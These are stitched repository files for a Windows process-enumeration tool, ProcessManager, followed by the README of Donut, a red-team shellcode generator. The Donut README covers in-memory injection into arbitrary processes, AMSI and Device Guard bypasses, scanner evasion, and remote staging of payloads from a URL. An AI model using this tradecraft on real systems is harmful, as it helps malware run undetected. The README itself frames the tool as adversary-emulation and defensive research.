32 <DefineConstants>TRACE</DefineConstants>
33 <ErrorReport>prompt</ErrorReport>
34 <WarningLevel>4</WarningLevel>
35 <Prefer32Bit>false</Prefer32Bit>
36 </PropertyGroup>
37 <ItemGroup>
38 <Reference Include="System" />
39 <Reference Include="System.Core" />
40 <Reference Include="System.Management" />
41 <Reference Include="System.Xml.Linq" />
42 <Reference Include="System.Data.DataSetExtensions" />
43 <Reference Include="Microsoft.CSharp" />
44 <Reference Include="System.Data" />
45 <Reference Include="System.Net.Http" />
46 <Reference Include="System.Xml" />
47 </ItemGroup>
48 <ItemGroup>
49 <Compile Include="Program.cs" />
50 <Compile Include="Properties\AssemblyInfo.cs" />
51 </ItemGroup>
52 <ItemGroup>
53 <None Include="App.config" />
54 </ItemGroup>
55 <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
56 </Project>
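Review bot: The reference list names `<Reference Include="Microsoft.CSharp" />` and `<Reference Include="System.Net.Http" />`, neither of which ships with the framework this project targets (`<TargetFrameworkVersion>v3.5</TargetFrameworkVersion>`), so they will most likely fail to resolve and produce build warnings. The using directives visible at the top of Program.cs (System, System.Linq, System.Diagnostics, System.Runtime.InteropServices, System.ComponentModel, System.Security.Principal) do not appear to need either assembly, although the rest of that file is outside this view. Dropping the two `<Reference>` items would keep the v3.5 build clean; alternatively, if they are needed, the target framework and the `supportedRuntime version="v2.0.50727"` entry in App.config would have to be raised together.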
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|AnyCPU'">
3 <StartArguments>
4 </StartArguments>
5 </PropertyGroup>
6 <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
7 <StartArguments>
8 </StartArguments>
9 </PropertyGroup>
10 </Project>
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ProcessManager", "ProcessManager.csproj", "{98CA74C7-A074-434D-9772-75896E73CEAA}"
6 EndProject
7 Global
8 GlobalSection(SolutionConfigurationPlatforms) = preSolution
9 Debug|Any CPU = Debug|Any CPU
10 Release|Any CPU = Release|Any CPU
11 EndGlobalSection
12 GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 {98CA74C7-A074-434D-9772-75896E73CEAA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
14 {98CA74C7-A074-434D-9772-75896E73CEAA}.Debug|Any CPU.Build.0 = Debug|Any CPU
15 {98CA74C7-A074-434D-9772-75896E73CEAA}.Release|Any CPU.ActiveCfg = Release|Any CPU
16 {98CA74C7-A074-434D-9772-75896E73CEAA}.Release|Any CPU.Build.0 = Release|Any CPU
17 EndGlobalSection
18 GlobalSection(SolutionProperties) = preSolution
19 HideSolutionNode = FALSE
20 EndGlobalSection
21 GlobalSection(ExtensibilityGlobals) = postSolution
22 SolutionGuid = {EA625DA1-2E6D-4092-B504-DEE5CD2E9F43}
23 EndGlobalSection
24 EndGlobal
0 /** Name: ProcessManager
1 * Author: TheWover
2 * Description: Displays useful information about processes running on a local or remote machine.
3 *
4 * Last Modified: 04/13/2018
5 *
6 */
7
8 using System;
9 using System.Linq;
10 using System.Diagnostics;
11 using System.Runtime.InteropServices;
12 using System.ComponentModel;
13 using System.Security.Principal;
14
15 namespace ProcessManager
16 {
17
18 class Program
19 {
20 private struct Arguments
21 {
22 public string processname;
23 public string machinename;
24 public bool help;
25 }
26
27 static void Main(string[] args)
28 {
29 //Parse command-line arguments
30 Arguments arguments = ParseArgs(args);
31
32 if (args.Length > 0)
33 {
34 if (arguments.help == true)
35 {
36 PrintUsage();
37 Environment.Exit(0);
38 }
39
40 Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", "Process Name", "PID", "PPID", "Arch", "Managed", "Session", "Integrity", "User");
41
42 //If the user specifed that a different machine should be used, then parse for the machine name and run the command.
43 if (arguments.machinename != null)
44 {
45 try
46 {
47 if (arguments.processname != null)
48
49 //Enumerate the processes
50 DescribeProcesses(Process.GetProcessesByName(arguments.processname, arguments.machinename));
51 else
52
53 //Enumerate the processes
54 DescribeProcesses(Process.GetProcesses(arguments.machinename));
55 }
56 catch
57 {
58 Console.WriteLine("Error: Invalid machine name.");
59
60 Environment.Exit(1);
61 }
62 }
63 else
64 {
65 if (arguments.processname != null)
66 //Enumerate the processes
67 DescribeProcesses(Process.GetProcessesByName(arguments.processname));
68 else
69 //Enumerate the processes
70 DescribeProcesses(Process.GetProcesses());
71 }
72
73 }
74 else
75 {
76 Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", "Process Name", "PID", "PPID", "Arch", "Managed", "Session", "Integrity" , "User");
77
78 DescribeProcesses(Process.GetProcesses());
79 }
80 }
81
82 private static Arguments ParseArgs(string[] args)
83 {
84 Arguments arguments = new Arguments();
85 arguments.help = false;
86 arguments.machinename = null;
87 arguments.processname = null;
88
89 if (args.Length > 0)
90 {
91 if (args.Contains("--help") || args.Contains("-h"))
92 {
93 arguments.help = true;
94 }
95 }
96
97 //Filter by process name
98 if (args.Contains("--name") && args.Length >= 2)
99 {
100 //The number of the command line argument that specifies the process name
101 int nameindex = new System.Collections.Generic.List<string>(args).IndexOf("--name") + 1;
102
103 arguments.processname = args[nameindex];
104 }
105
106 //If the user specifed that a different machine should be used, then parse for the machine name and run the command.
107 if (args.Contains("--machine") && args.Length >= 2)
108 {
109 try
110 {
111 //The number of the command line argument that specifies the machine name
112 int machineindex = new System.Collections.Generic.List<string>(args).IndexOf("--machine") + 1;
113
114 arguments.machinename = args[machineindex];
115 }
116 catch
117 {
118 Console.WriteLine("Error: Invalid machine name.");
119
120 Environment.Exit(1);
121 }
122
123 }
124
125 return arguments;
126 }
127
128 private static void PrintUsage()
129 {
130 Console.WriteLine();
131 Console.WriteLine("| Process Manager [v0.2]");
132 Console.WriteLine("| Copyright (c) 2019 TheWover");
133 Console.WriteLine();
134
135 Console.WriteLine("Usage: ProcessManager.exe [machine]");
136 Console.WriteLine();
137
138 Console.WriteLine("{0,-5} {1,-20} {2}", "", "-h, --help", "Display this help menu.");
139 Console.WriteLine("{0,-5} {1,-20} {2}", "", "--machine", "Specify a machine to query. Machine name or IP Address may be used.");
140 Console.WriteLine("{0,-5} {1,-20} {2}", "", "--name", "Filter by a process name.");
141 Console.WriteLine();
142
143 Console.WriteLine("Examples:");
144 Console.WriteLine();
145
146 Console.WriteLine("ProcessManager.exe");
147 Console.WriteLine("ProcessManager.exe --name svchost");
148 Console.WriteLine("ProcessManager.exe --machine workstation2");
149 Console.WriteLine("ProcessManager.exe --machine 10.30.134.13");
150 Console.WriteLine();
151 }
152
153 private static void DescribeProcesses(Process[] processes)
154 {
155
156 //Sort in ascending order by PID
157 processes = processes.OrderBy(p => p.Id).ToArray();
158
159 foreach (Process process in processes)
160 {
161 //Get the PID
162 ProcessDetails details = new ProcessDetails();
163 details.name = process.ProcessName;
164 details.pid = process.Id;
165
166 try
167 {
168 //Get the PPID
169 Process parent = ParentProcessUtilities.GetParentProcess(process.Id);
170 if (parent != null)
171 details.ppid = parent.Id;
172 else
173 details.ppid = -1;
174 }
175 //Parent is no longer running
176 catch (InvalidOperationException)
177 {
178 details.ppid = -1;
179 }
180
181
182 //Check the architecture
183 try
184 {
185 if (ProcessInspector.IsWow64Process(process))
186 details.arch = "x86";
187 else
188 details.arch = "x64";
189 }
190 catch
191 {
192 details.arch = "*";
193 }
194
195 try
196 {
197 //Determine whether or not the process is managed (has the CLR loaded).
198 details.managed = ProcessInspector.IsCLRLoaded(process);
199 }
200 //Process is no longer running
201 catch (InvalidOperationException)
202 {
203 details.managed = false;
204 }
205
206
207 try
208 {
209 //Gets the Session of the Process
210 details.session = process.SessionId;
211 }
212 //Process is no longer running
213 catch (InvalidOperationException)
214 {
215 details.session = -1;
216 }
217
218
219 try
220 {
221 //Gets the Integrity Level of the process
222 details.integrity = TokenInspector.GetIntegrityLevel(process);
223 }
224 //Process is no longer running
225 catch (InvalidOperationException)
226 {
227 details.integrity = TokenInspector.IntegrityLevel.Unknown;
228 }
229
230
231 try
232 {
233 //Gets the User of the Process
234 details.user = ProcessInspector.GetProcessUser(process);
235 }
236 //Process is no longer running
237 catch (InvalidOperationException)
238 {
239 details.user = "";
240 }
241
242 Console.WriteLine("{0,-30} {1,-10} {2,-10} {3,-10} {4,-10} {5,-10} {6,-10} {7}", details.name, details.pid, details.ppid, details.arch, details.managed, details.session, details.integrity, details.user);
243 }
244 }
245 }
246
247 public struct ProcessDetails
248 {
249 public string name;
250 public int pid;
251 public int ppid;
252 public string arch;
253 public bool managed;
254 public int session;
255 public TokenInspector.IntegrityLevel integrity;
256 public string user;
257 }
258
259 public static class ProcessInspector
260 {
261
262 [System.Runtime.InteropServices.DllImport("kernel32.dll")]
263 public static extern bool IsWow64Process(System.IntPtr hProcess, out bool lpSystemInfo);
264
265 [DllImport("ntdll.dll")]
266 private static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, ref ParentProcessUtilities processInformation, int processInformationLength, out int returnLength);
267
268 [DllImport("advapi32.dll", SetLastError = true)]
269 private static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
270 [DllImport("kernel32.dll", SetLastError = true)]
271 [return: MarshalAs(UnmanagedType.Bool)]
272 private static extern bool CloseHandle(IntPtr hObject);
273
274 /// <summary>
275 /// Gets the parent process of a specified process.
276 /// </summary>
277 /// <returns>A Process object representing the parent.</returns>
278 public static Process GetParentProcess(Process process)
279 {
280 return ParentProcessUtilities.GetParentProcess(process.Id);
281 }
282
283 /// <summary>
284 /// Gets the parent process of a specified process.
285 /// </summary>
286 /// <returns>A Process object representing the parent.</returns>
287 public static Process GetParentProcess()
288 {
289 return GetParentProcess(Process.GetCurrentProcess());
290 }
291
292 /// <summary>
293 /// Checks whether the process is 64-bit.
294 /// </summary>
295 /// <returns>Returns true if process is 64-bit, and false if process is 32-bit.</returns>
296 public static bool IsWow64Process(Process process)
297 {
298 bool retVal = false;
299 IsWow64Process(process.Handle, out retVal);
300 return retVal;
301 }
302
303 /// <summary>
304 /// Checks whether the process is 64-bit.
305 /// </summary>
306 /// <returns>Returns false if process is 64-bit, and true if process is 32-bit. Refer to MSDN for further details.</returns>
307 public static bool IsWow64Process()
308 {
309 bool retVal = false;
310 IsWow64Process(Process.GetCurrentProcess().Handle, out retVal);
311 return retVal;
312 }
313
314 /// <summary>
315 /// Checks if the CLR has been loaded into the specified process by
316 /// looking for loaded modules that contain "mscor" in the name.
317 /// </summary>
318 /// <param name="process">The process to check.</param>
319 /// <returns>True if the CLR has been loaded. False if it has not.</returns>
320 public static bool IsCLRLoaded(Process process)
321 {
322 try
323 {
324 var modules = from module in process.Modules.OfType<ProcessModule>()
325 select module;
326
327 return modules.Any(pm => pm.ModuleName.Contains("mscor"));
328 }
329 //Access was denied
330 catch (Win32Exception)
331 {
332 return false;
333 }
334 //Process has already exited
335 catch (InvalidOperationException)
336 {
337 return false;
338 }
339
340 }
341
342 /// <summary>
343 /// Gets the owner of a process.
344 ///
345 /// https://stackoverflow.com/questions/777548/how-do-i-determine-the-owner-of-a-process-in-c
346 /// </summary>
347 /// <param name="process">The process to inspect.</param>
348 /// <returns>The name of the user, or null if it could not be read.</returns>
349 public static string GetProcessUser(Process process)
350 {
351 IntPtr processHandle = IntPtr.Zero;
352 try
353 {
354 OpenProcessToken(process.Handle, 8, out processHandle);
355 WindowsIdentity wi = new WindowsIdentity(processHandle);
356 return wi.Name;
357 }
358 catch
359 {
360 return null;
361 }
362 finally
363 {
364 if (processHandle != IntPtr.Zero)
365 {
366 CloseHandle(processHandle);
367 }
368 }
369 }
370
371 }//end class
372
373 /// <summary>
374 /// A utility class to determine a process parent.
375 /// </summary>
376 [StructLayout(LayoutKind.Sequential)]
377 public struct ParentProcessUtilities
378 {
379 // These members must match PROCESS_BASIC_INFORMATION
380 internal IntPtr Reserved1;
381 internal IntPtr PebBaseAddress;
382 internal IntPtr Reserved2_0;
383 internal IntPtr Reserved2_1;
384 internal IntPtr UniqueProcessId;
385 internal IntPtr InheritedFromUniqueProcessId;
386
387 [DllImport("ntdll.dll")]
388 private static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, ref ParentProcessUtilities processInformation, int processInformationLength, out int returnLength);
389
390 /// <summary>
391 /// Gets the parent process of the current process.
392 /// </summary>
393 /// <returns>An instance of the Process class.</returns>
394 public static Process GetParentProcess()
395 {
396 return GetParentProcess(Process.GetCurrentProcess().Handle);
397 }
398
399 /// <summary>
400 /// Gets the parent process of specified process.
401 /// </summary>
402 /// <param name="id">The process id.</param>
403 /// <returns>An instance of the Process class.</returns>
404 public static Process GetParentProcess(int id)
405 {
406 try
407 {
408 Process process = Process.GetProcessById(id);
409
410 GetParentProcess(process.Handle);
411
412 return GetParentProcess(process.Handle);
413 }
414 //Access was denied, or
415 catch
416 {
417 return null;
418 }
419 }
420
421 /// <summary>
422 /// Gets the parent process of a specified process.
423 /// </summary>
424 /// <param name="handle">The process handle.</param>
425 /// <returns>An instance of the Process class.</returns>
426 public static Process GetParentProcess(IntPtr handle)
427 {
428 ParentProcessUtilities pbi = new ParentProcessUtilities();
429 int returnLength;
430 int status = NtQueryInformationProcess(handle, 0, ref pbi, Marshal.SizeOf(pbi), out returnLength);
431 if (status != 0)
432 throw new Win32Exception(status);
433
434 try
435 {
436 return Process.GetProcessById(pbi.InheritedFromUniqueProcessId.ToInt32());
437 }
438 catch (ArgumentException)
439 {
440 // not found
441 return null;
442 }
443 }
444 }
445
446 /// <summary>
447 /// Inspects the tokens of an arbitrary Process and reports useful information.
448 ///
449 /// This class is almost entirely copied from the example provided by pinvoke.net:
450 /// http://pinvoke.net/default.aspx/Constants/SECURITY_MANDATORY.html
451 /// </summary>
452 public class TokenInspector
453 {
454 [DllImport("advapi32.dll", SetLastError = true)]
455 static extern IntPtr GetSidSubAuthority(IntPtr sid, UInt32 subAuthorityIndex);
456
457 [DllImport("advapi32.dll", SetLastError = true)]
458 static extern IntPtr GetSidSubAuthorityCount(IntPtr sid);
459
460 // winnt.h, Windows SDK v6.1
461 const int SECURITY_MANDATORY_UNTRUSTED_RID = (0x00000000);
462 const int SECURITY_MANDATORY_LOW_RID = (0x00001000);
463 const int SECURITY_MANDATORY_MEDIUM_RID = (0x00002000);
464 const int SECURITY_MANDATORY_HIGH_RID = (0x00003000);
465 const int SECURITY_MANDATORY_SYSTEM_RID = (0x00004000);
466 const int SECURITY_MANDATORY_PROTECTED_PROCESS_RID = (0x00005000);
467
468 [DllImport("advapi32.dll", SetLastError = true)]
469 [return: MarshalAs(UnmanagedType.Bool)]
470 static extern bool OpenProcessToken(
471 IntPtr ProcessHandle,
472 UInt32 DesiredAccess,
473 out IntPtr TokenHandle
474 );
475
476 const UInt32 TOKEN_QUERY = 0x0008;
477
478 [DllImport("advapi32.dll", SetLastError = true)]
479 static extern bool GetTokenInformation(
480 IntPtr TokenHandle,
481 TOKEN_INFORMATION_CLASS TokenInformationClass,
482 IntPtr TokenInformation,
483 uint TokenInformationLength,
484 out uint ReturnLength
485 );
486
487 enum TOKEN_INFORMATION_CLASS
488 {
489 TokenUser = 1, TokenGroups, TokenPrivileges, TokenOwner, TokenPrimaryGroup, TokenDefaultDacl, TokenSource, TokenType, TokenImpersonationLevel, TokenStatistics, TokenRestrictedSids, TokenSessionId, TokenGroupsAndPrivileges, TokenSessionReference, TokenSandBoxInert, TokenAuditPolicy, TokenOrigin, TokenElevationType, TokenLinkedToken, TokenElevation, TokenHasRestrictions, TokenAccessInformation, TokenVirtualizationAllowed, TokenVirtualizationEnabled,
490
491 /// <summary>
492 /// The buffer receives a TOKEN_MANDATORY_LABEL structure that specifies the token's integrity level.
493 /// </summary>
494 TokenIntegrityLevel,
495
496 TokenUIAccess, TokenMandatoryPolicy, TokenLogonSid, MaxTokenInfoClass
497 }
498
499 public enum IntegrityLevel
500 {
501 Low, Medium, High, System, None, Unknown
502 }
503
504 const int ERROR_INVALID_PARAMETER = 87;
505
506 [DllImport("kernel32.dll", SetLastError = true)]
507 static extern bool CloseHandle(IntPtr hHandle);
508
509
510 public static IntegrityLevel GetIntegrityLevel(Process process)
511 {
512 try
513 {
514 IntPtr pId = (process.Handle);
515
516 IntPtr hToken = IntPtr.Zero;
517 if (OpenProcessToken(pId, TOKEN_QUERY, out hToken))
518 {
519 try
520 {
521 IntPtr pb = Marshal.AllocCoTaskMem(1000);
522 try
523 {
524 uint cb = 1000;
525 if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenIntegrityLevel, pb, cb, out cb))
526 {
527 IntPtr pSid = Marshal.ReadIntPtr(pb);
528
529 int dwIntegrityLevel = Marshal.ReadInt32(GetSidSubAuthority(pSid, (Marshal.ReadByte(GetSidSubAuthorityCount(pSid)) - 1U)));
530
531 if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID)
532 {
533 return IntegrityLevel.Low;
534 }
535 else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
536 {
537 // Medium Integrity
538 return IntegrityLevel.Medium;
539 }
540 else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID)
541 {
542 // High Integrity
543 return IntegrityLevel.High;
544 }
545 else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID)
546 {
547 // System Integrity
548 return IntegrityLevel.System;
549 }
550 return IntegrityLevel.None;
551 }
552 else
553 {
554 return IntegrityLevel.Unknown;
555 }
556 }
557 finally
558 {
559 Marshal.FreeCoTaskMem(pb);
560 }
561 }
562 finally
563 {
564 CloseHandle(hToken);
565
566 }
567 }
568 }
569 catch (Win32Exception ex)
570 {
571 return IntegrityLevel.Unknown;
572 }
573
574 //If we made it this far through all of the finally blocks and didn't return, then return unknown
575 return IntegrityLevel.Unknown;
576 }
577 }
578 }
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("ProcessManager")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("ProcessManager")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("98ca74c7-a074-434d-9772-75896e73ceaa")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
0 # ProcessManager
1
2 Has its own repo at: https://github.com/TheWover/ProcessManager
3
4 ps-like .NET Assembly for enumerating processes on the current machine or a remote machine (using current token). Has the unique feature of telling you whether each process is managed (has the CLR loaded). Compatible with .NET v3.5.
5
6 All enumeration is done with only built-in .NET APIs and PInvoke, rather than any third-party libraries or usage of WMI.
7
8 * PPID value of "-1" means that the parent is no longer running or is not accessible.
9 * Arch value of "*" means that the process could not be accessed or the architecture could not be determined. Usually a permissions issue.
10 * Managed value of "True" means that the CLR is loaded into the process. That is, it is a "managed" process because it is running .NET managed code.
11 * Integrity value of "Unknown" means exactly that.
12 * Blank User value means that the user information of the process could not be obtained.
13
14 **I have not tested ProcessManager's remote enumeration option. :-P Neither me nor Odzhan have a lab setup for testing that. Please feel free to let us know of any issues.**
15
16 ![Alt text](https://github.com/TheWover/ProcessManager/blob/master/img/usage.JPG?raw=true "General Usage")
17
18 # Usage
19
20 ```
21 | Process Manager [v0.2]
22 | Copyright (c) 2019 TheWover
23
24 Usage: ProcessManager.exe [options]
25
26 -h, --help Display this help menu.
27 --machine Specify a machine to query. Machine name or IP Address may be used.
28 --name Filter by a process name.
29
30 Examples:
31
32 ProcessManager.exe
33 ProcessManager.exe --name svchost
34 ProcessManager.exe --machine workstation2
35 ProcessManager.exe --machine 10.30.134.13
36 ```
0 # Using Donut
1
2 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
3
4 Version: 0.9.2 *please submit issues and requests for v1.0 release*
5
6 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
7
8 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
9
10 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
11
12 ## Introduction
13
14 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
15
16 It can be used in several ways.
17
18 ## As a Standalone Tool
19
20 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
21
22 ```
23
24 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
25
26 -MODULE OPTIONS-
27
28 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
29 -u <URL> HTTP server that will host the donut module.
30
31 -PIC/SHELLCODE OPTIONS-
32
33 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
34 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
35 -o <payload> Output file. Default is "payload.bin"
36
37 -DOTNET OPTIONS-
38
39 -c <namespace.class> Optional class name. (required for .NET DLL)
40 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
41 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
42 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
43 -d <name> AppDomain name to create for .NET. Randomly generated by default.
44
45 examples:
46
47 donut -f c2.dll
48 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
49 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
50
51 ```
52
53 ### Building Donut
54
55 Tags have been provided for each release version of donut that contain the compiled executables.
56
57 * v0.9.2, Bear Claw:
58 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
59 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
60 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
61
62 However, you may also clone and build the source yourself using the provided makefiles.
63
64 ## Building From Repository
65
66 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
67
68 ```
69 git clone http://github.com/thewover/donut
70 cd donut
71 ```
72
73 ## Linux
74
75 Simply run make to generate an executable, static and dynamic libraries.
76
77 ```
78 make
79 make clean
80 make debug
81 ```
82
83 ## Windows
84
85 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
86
87 ```
88 nmake -f Makefile.msvc
89 nmake clean -f Makefile.msvc
90 nmake debug -f Makefile.msvc
91 ```
92
93 ## As a Library
94
95 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
96
97 ## As a Python Module
98
99 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
100
101 ```
102 pip install .
103 ```
104
105 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
106
107 ```
108 pip install donut-shellcode
109 ```
110
111 ## As a Template - Rebuilding the shellcode
112
113 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
114
115 ### Microsoft Visual Studio
116
117 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
118
119 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
120
121 ```
122 nmake clean -f Makefile.msvc
123 nmake -f Makefile.msvc
124 ```
125
126 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
127
128 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
129
130 ```
131 nmake clean -f Makefile.msvc
132 nmake x86 -f Makefile.msvc
133 ```
134
135 This will save the shellcode as a C array to *payload_exe_x86.h*.
136
137 ### Mingw-w64
138
139 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
140
141 ```
142 make clean -f Makefile.mingw
143 make -f Makefile.mingw
144 ```
145
146 Once you've recompiled for all architectures, you may rebuild donut.
147
148 ## Bypasses
149
150 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
151
152 * AMSI in .NET v4.8
153 * Device Guard policy preventing dynamicly generated code from executing
154
155 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
156
157 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
158
159 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
160
161 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
162
163 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
164
165 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
166
167 ### Additional features.
168
169 These are left as exercises to the reader. I would personally recommend:
170
171 * Add environmental keying
172 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
173 * Integrate donut as a module into your favorite RAT/C2 Framework
174
175 ## Disclaimers
176
177 * No, we will not update donut to counter signatures or detections by any AV.
178 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
179
180 # How it works
181
182 ## Procedure for Assemblies
183
184 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
185
186 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
187
188 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
189
190 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
191
192 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
193
194 ## Procedure for ActiveScript/XSL
195
196 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
197
198 ## Procedure for PE Loading
199
200 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
201
202 ## Components
203
204 Donut contains the following elements:
205
206 * donut.c: The source code for the donut payload generator
